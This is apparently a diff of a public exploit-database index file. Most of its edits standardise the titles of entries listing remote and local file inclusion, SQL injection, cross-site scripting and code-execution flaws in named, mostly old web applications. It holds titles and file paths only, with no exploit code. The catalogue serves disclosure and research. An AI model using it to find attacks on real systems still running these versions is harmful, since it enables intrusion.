+30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php' 'config[root_ordner]' Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0
+30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0
 30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0
 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0
 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0
@@ -31811,8 +31815,8 @@ id,file,description,date,author,platform,type,port
 30501,platforms/php/webapps/30501.txt,"Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusion",2007-07-09,Crackers_Child,php,webapps,0
 30504,platforms/php/webapps/30504.txt,"Olate Download 3.4.1 - admin.php Remote Authentication Bypass",2007-07-16,imei,php,webapps,0
 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - TextFileSearch.asp Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0
-30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - forumreply.php Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0
-30510,platforms/php/webapps/30510.txt,"Firesoft - Class_TPL.php Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0
+30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0
+30510,platforms/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0
 30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 - Uyeler2.php SQL Injection",2007-08-20,dumenci,php,webapps,0
 30514,platforms/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,java,webapps,0
 30515,platforms/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,php,webapps,0
@@ -31843,7 +31847,7 @@ id,file,description,date,author,platform,type,port
 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0
 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0
 30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - search/index.php highlight Parameter SQL Injection",2007-11-10,Doz,php,webapps,0
-30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - autohtml.php Local File Inclusion",2007-11-10,d3v1l,php,webapps,0
+30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps,0
 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0
 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0
 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0
@@ -31916,7 +31920,7 @@ id,file,description,date,author,platform,type,port
 30629,platforms/asp/webapps/30629.txt,"ASP Product Catalog 1.0 - default.asp SQL Injection",2007-10-01,joseph.giron13,asp,webapps,0
 30632,platforms/php/webapps/30632.txt,"DRBGuestbook 1.1.13 - 'index.php' Cross-Site Scripting",2007-10-03,Gokhan,php,webapps,0
 30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0
-30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - postComment.php Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
+30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
 30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
 30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
 30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
@@ -31970,12 +31974,12 @@ id,file,description,date,author,platform,type,port
 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0
 30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0
 30700,platforms/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0
-30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - download.php Local File Inclusion",2007-10-22,hack2prison,php,webapps,0
+30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,php,webapps,0
 30703,platforms/php/webapps/30703.txt,"Japanese PHP Gallery Hosting - Arbitrary File Upload",2007-10-23,"Pete Houston",php,webapps,0
 30704,platforms/jsp/webapps/30704.txt,"Korean GHBoard FlashUpload Component - download.jsp name Parameter Arbitrary File Access",2007-10-23,Xcross87,jsp,webapps,0
 30705,platforms/jsp/webapps/30705.txt,"Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload",2007-10-23,Xcross87,jsp,webapps,0
 30706,platforms/asp/webapps/30706.txt,"CodeWidgets Web Based Alpha Tabbed Address Book - index.asp SQL Injection",2007-10-24,"Aria-Security Team",asp,webapps,0
-30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - Includes.php Remote File Inclusion",2007-10-24,Alucar,php,webapps,0
+30707,platforms/php/webapps/30707.txt,"PHPbasic basicFramework 1.0 - 'Includes.php' Remote File Inclusion",2007-10-24,Alucar,php,webapps,0
 30708,platforms/asp/webapps/30708.txt,"Aleris Web Publishing Server 3.0 - Page.asp SQL Injection",2007-10-25,joseph.giron13,asp,webapps,0
 30712,platforms/php/webapps/30712.txt,"Multi-Forums - 'Directory.php' Multiple SQL Injections",2007-10-25,KiNgOfThEwOrLd,php,webapps,0
 30715,platforms/php/webapps/30715.txt,"WordPress 2.3 - Edit-Post-Rows.php Cross-Site Scripting",2007-10-29,waraxe,php,webapps,0
@@ -31995,7 +31999,7 @@ id,file,description,date,author,platform,type,port
 30733,platforms/php/webapps/30733.txt,"phpMyAdmin 2.11.1 - Server_Status.php Cross-Site Scripting",2007-10-17,"Omer Singer",php,webapps,0
 30734,platforms/php/webapps/30734.txt,"Helios Calendar 1.1/1.2 - admin/index.php Cross-Site Scripting",2007-11-02,"Ivan Sanchez",php,webapps,0
 30735,platforms/php/webapps/30735.txt,"PHP Helpdesk 0.6.16 - 'index.php' Local File Inclusion",2007-11-03,joseph.giron13,php,webapps,0
-30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - Upload_Config.php Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0
+30737,platforms/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",2007-11-05,"arfis project",php,webapps,0
 30738,platforms/php/webapps/30738.txt,"E-Vendejo 0.2 - Articles.php SQL Injection",2007-11-05,r00t,php,webapps,0
 30739,platforms/php/webapps/30739.txt,"JLMForo System - Buscado.php Cross-Site Scripting",2007-11-05,"Jose Luis Gongora Fernandez",php,webapps,0
 30741,platforms/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",2007-11-05,"BorN To K!LL",php,webapps,0
@@ -32082,7 +32086,7 @@ id,file,description,date,author,platform,type,port
 30918,platforms/php/webapps/30918.txt,"iDevSpot iSupport 1.8 - 'index.php' Local File Inclusion",2007-12-20,JuMp-Er,php,webapps,0
 30919,platforms/cgi/webapps/30919.txt,"SiteScape Forum - 'dispatch.cgi' Tcl Command Injection",2007-12-20,niekt0,cgi,webapps,0
 30921,platforms/php/webapps/30921.txt,"MRBS 1.2.x - 'view_entry.php' SQL Injection",2007-12-21,root@hanicker.it,php,webapps,0
-30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - Games.php ID Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0
+30923,platforms/php/webapps/30923.txt,"MyBlog 1.x - 'Games.php' 'ID' Remote File Inclusion",2007-12-22,"Beenu Arora",php,webapps,0
 30924,platforms/php/webapps/30924.txt,"Dokeos 1.x - forum/viewthread.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0
 30925,platforms/php/webapps/30925.txt,"Dokeos 1.x - forum/viewforum.php forum Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0
 30926,platforms/php/webapps/30926.txt,"Dokeos 1.x - work/work.php display_upload_form Action origin Parameter Cross-Site Scripting",2007-12-22,Doz,php,webapps,0
@@ -32348,7 +32352,7 @@ id,file,description,date,author,platform,type,port
 31317,platforms/php/webapps/31317.txt,"NetOffice Dwins 1.3 - Authentication Bypass / Arbitrary File Upload",2008-02-29,RawSecurity.org,php,webapps,0
 31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 - 'index.php' Local File Inclusion",2008-02-29,JosS,php,webapps,0
 31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts Gallery 0.x - 'index.php' Cross-Site Scripting",2008-02-29,ZoRLu,php,webapps,0
-31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - tourney/index.php Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0
+31320,platforms/php/webapps/31320.txt,"PHPMyTourney 2 - 'tourney/index.php' Remote File Inclusion",2008-02-29,"HACKERS PAL",php,webapps,0
 31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk - Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0
 31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'Gaestebuch 2.2 Module - 'id' Parameter SQL Injection",2008-03-01,TurkishWarriorr,php,webapps,0
 31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 - minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
@@ -32429,15 +32433,15 @@ id,file,description,date,author,platform,type,port
 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' 'dir' Parameter Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0
 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0
 31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0
-31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
-31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - 'add_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - 'create_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - 'create_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - 'delete_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - 'delete_user.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - 'edit_forum.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - 'mail_users.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - 'moderate_notes.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - 'reorder_forums.php' bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80
 31459,platforms/php/webapps/31459.txt,"Joomla! 3.2.1 - SQL Injection",2014-02-06,killall-9,php,webapps,80
 31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
@@ -32859,7 +32863,7 @@ id,file,description,date,author,platform,type,port
 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0
 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0
 32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0
-32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
+32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - 'modules/system/admin.php' 'fct' Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0
 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
 32100,platforms/php/webapps/32100.txt,"RunCMS 1.6.1 - 'bbPath[root_theme]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0
@@ -33117,7 +33121,7 @@ id,file,description,date,author,platform,type,port
 32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps,0
 32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,php,webapps,0
 32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0
-32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
+32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Web Shell",2014-03-26,"Groundworks Technologies",hardware,webapps,80
 32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0
 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps,0
 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps,0
@@ -33865,7 +33869,7 @@ id,file,description,date,author,platform,type,port
 33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Parameter Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",php,webapps,0
 33975,platforms/php/webapps/33975.html,"Affiliate Store Builder - 'edit_cms.php' Multiple SQL Injections",2010-05-11,"High-Tech Bridge SA",php,webapps,0
 33978,platforms/php/webapps/33978.txt,"TomatoCMS 2.0.x - SQL Injection",2010-05-12,"Russ McRee",php,webapps,0
-33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
+33979,platforms/php/webapps/33979.txt,"C99Shell 1.0 Pre-Release build 16 (Web Shell) - 'ch99.php' Cross-Site Scripting",2010-05-19,indoushka,php,webapps,0
 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0
 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0
 33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0
@@ -33895,7 +33899,7 @@ id,file,description,date,author,platform,type,port
 34023,platforms/php/webapps/34023.txt,"Lisk CMS 4.4 - 'id' Parameter Multiple Cross-Site Scripting / SQL Injection",2010-05-20,"High-Tech Bridge SA",php,webapps,0
 34024,platforms/php/webapps/34024.txt,"Triburom - 'forum.php' Cross-Site Scripting",2010-01-15,ViRuSMaN,php,webapps,0
 34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0
-34025,platforms/php/webapps/34025.txt,"C99 Shell - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
+34025,platforms/php/webapps/34025.txt,"C99Shell (Web Shell) - 'c99.php' Authentication Bypass",2014-07-10,Mandat0ry,php,webapps,0
 34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 - Multiple SQL Injections",2010-05-21,epixoip,php,webapps,0
 34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
 34032,platforms/php/webapps/34032.txt,"NPDS REvolution 10.02 - 'admin.php' Cross-Site Request Forgery",2010-05-20,"High-Tech Bridge SA",php,webapps,0
@@ -34468,7 +34472,7 @@ id,file,description,date,author,platform,type,port
 34902,platforms/php/webapps/34902.txt,"PHP Scripts Now Riddles - '/riddles/results.php' 'searchQuery' Parameter Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0
 34903,platforms/php/webapps/34903.txt,"PHP Scripts Now Riddles - '/riddles/list.php' 'catid' Parameter SQL Injection",2009-08-20,Moudi,php,webapps,0
 34904,platforms/php/webapps/34904.txt,"Radvision Scopia - 'entry/index.jsp' Cross-Site Scripting",2009-08-24,"Francesco Bianchino",php,webapps,0
-34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - search.php3 bn Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0
+34905,platforms/php/webapps/34905.txt,"W-Agora 4.2.1 - 'search.php3' 'bn' Parameter Traversal Local File Inclusion",2010-10-22,MustLive,php,webapps,0
 34906,platforms/php/webapps/34906.txt,"W-Agora 4.2.1 - search.php bn Parameter Cross-Site Scripting",2010-10-22,MustLive,php,webapps,0
 34907,platforms/multiple/webapps/34907.txt,"IBM Tivoli Access Manager for E-Business - ivt/ivtserver parm1 Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0
 34908,platforms/multiple/webapps/34908.txt,"IBM Tivoli Access Manager for E-Business - ibm/wpm/acl method Parameter Cross-Site Scripting",2010-10-22,IBM,multiple,webapps,0
@@ -34993,7 +34997,7 @@ id,file,description,date,author,platform,type,port
 35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888
 35781,platforms/java/webapps/35781.txt,"CiscoWorks Common Services 3.1.1 - Auditing Directory Traversal",2011-05-18,"Sense of Security",java,webapps,0
 35782,platforms/php/webapps/35782.txt,"Room Juice 0.3.3 - 'display.php' Cross-Site Scripting",2011-05-19,"AutoSec Tools",php,webapps,0
-35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' Remote PHP Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0
+35783,platforms/php/webapps/35783.html,"Andy's PHP KnowledgeBase 0.95.4 - 'step5.php' PHP Remote Code Execution",2011-05-19,"AutoSec Tools",php,webapps,0
 35787,platforms/php/webapps/35787.txt,"LimeSurvey 1.85+ - 'admin.php' Cross-Site Scripting",2011-05-19,"Juan Manuel Garcia",php,webapps,0
 35788,platforms/php/webapps/35788.txt,"Joomla! Component Map Locator - 'cid' Parameter SQL Injection",2011-05-23,FL0RiX,php,webapps,0
 35789,platforms/php/webapps/35789.txt,"phpScheduleIt 1.2.12 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-24,"High-Tech Bridge SA",php,webapps,0
@@ -35895,7 +35899,7 @@ id,file,description,date,author,platform,type,port
 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 - main.php Multiple Function Cross-Site Request Forgery",2012-04-27,AkaStep,php,webapps,0
 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 - Persistent Cross-Site Scripting",2015-05-27,"Panagiotis Vagenas",php,webapps,80
 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 - 'index.php' page Parameter Cross-Site Scripting",2012-04-27,AkaStep,php,webapps,0
-37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' Remote PHP Code Execution",2012-04-27,AkaStep,php,webapps,0
+37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 - 'menu.php' PHP Remote Code Execution",2012-04-27,AkaStep,php,webapps,0
 37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A - Cross-Site Scripting",2012-05-02,"Usman Saeed",hardware,webapps,0
 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0
 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0
@@ -36278,7 +36282,7 @@ id,file,description,date,author,platform,type,port
 37725,platforms/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",php,webapps,0
 37726,platforms/php/webapps/37726.txt,"PHP News Script 4.0.0 - SQL Injection",2015-08-07,"Meisam Monsef",php,webapps,80
 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80
-37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80
+37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,php,webapps,80
 37753,platforms/php/webapps/37753.txt,"WordPress Plugin Simple Image Manipulator 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37738,platforms/php/webapps/37738.txt,"WordPress Plugin Job Manager 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80
 37824,platforms/php/webapps/37824.txt,"WordPress Plugin WP Symposium 15.1 - 'get_album_item.php' SQL Injection",2015-08-18,PizzaHatHacker,php,webapps,80
@@ -36289,7 +36293,7 @@ id,file,description,date,author,platform,type,port
 37950,platforms/php/webapps/37950.txt,"jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting",2012-10-17,"High-Tech Bridge",php,webapps,0
 37757,platforms/multiple/webapps/37757.py,"Geoserver < 2.7.1.1 / < 2.6.4 / < 2.5.5.1 - XXE Exploit",2015-08-12,"David Bloom",multiple,webapps,0
 37761,platforms/ios/webapps/37761.txt,"Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting",2015-08-12,"Taurus Omar",ios,webapps,0
-37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - XML eXternal Entity Injection (XXE) on PHP FPM",2015-08-13,"Dawid Golunski",multiple,webapps,0
+37765,platforms/multiple/webapps/37765.txt,"Zend Framework 2.4.2 - PHP FPM XML eXternal Entity Injection",2015-08-13,"Dawid Golunski",multiple,webapps,0
 37767,platforms/multiple/webapps/37767.txt,"Joomla! Component 'com_jem' 2.1.4 - Multiple Vulnerabilities",2015-08-13,"Martino Sani",multiple,webapps,0
 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0
 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0
@@ -36319,7 +36323,7 @@ id,file,description,date,author,platform,type,port
 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS - 'cid' Parameter SQL Injection",2012-09-18,Crim3R,php,webapps,0
 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager - Multiple Cross-Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0
 37807,platforms/php/webapps/37807.txt,"vBulletin 4.1.12 - 'blog_plugin_useradmin.php' SQL Injection",2012-09-18,Am!r,php,webapps,0
-37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
+37809,platforms/php/webapps/37809.php,"Nuts CMS - PHP Remote Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80
 37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - Cross-Site Scripting",2015-08-18,hyp3rlinx,php,webapps,80
 37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - Cross-Site Request Forgery",2015-08-18,hyp3rlinx,php,webapps,80
@@ -36649,7 +36653,7 @@ id,file,description,date,author,platform,type,port
 38487,platforms/php/webapps/38487.txt,"WordPress Theme Colormix - Multiple Vulnerabilities",2013-04-21,MustLive,php,webapps,0
 38488,platforms/hardware/webapps/38488.txt,"Belkin Router N150 1.00.08/1.00.09 - Directory Traversal",2015-10-19,"Rahul Pratap Singh",hardware,webapps,0
 38491,platforms/php/webapps/38491.php,"SMF - 'index.php' HTML Injection / Multiple PHP Code Injection Vulnerabilities",2013-04-23,"Jakub Galczyk",php,webapps,0
-38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - Remote PHP Code Execution",2013-04-24,anonymous,php,webapps,0
+38494,platforms/php/webapps/38494.txt,"WordPress Plugin WP Super Cache - PHP Remote Code Execution",2013-04-24,anonymous,php,webapps,0
 38496,platforms/php/webapps/38496.txt,"RealtyScript 4.0.2 - Multiple Cross-Site Request Forgery / Persistent Cross-Site Scripting Vulnerabilities",2015-10-19,LiquidWorm,php,webapps,0
 38497,platforms/php/webapps/38497.txt,"RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections",2015-10-19,LiquidWorm,php,webapps,0
 38499,platforms/php/webapps/38499.html,"PHPValley Micro Jobs Site Script - Spoofing",2013-04-27,"Jason Whelan",php,webapps,0
@@ -36750,7 +36754,7 @@ id,file,description,date,author,platform,type,port
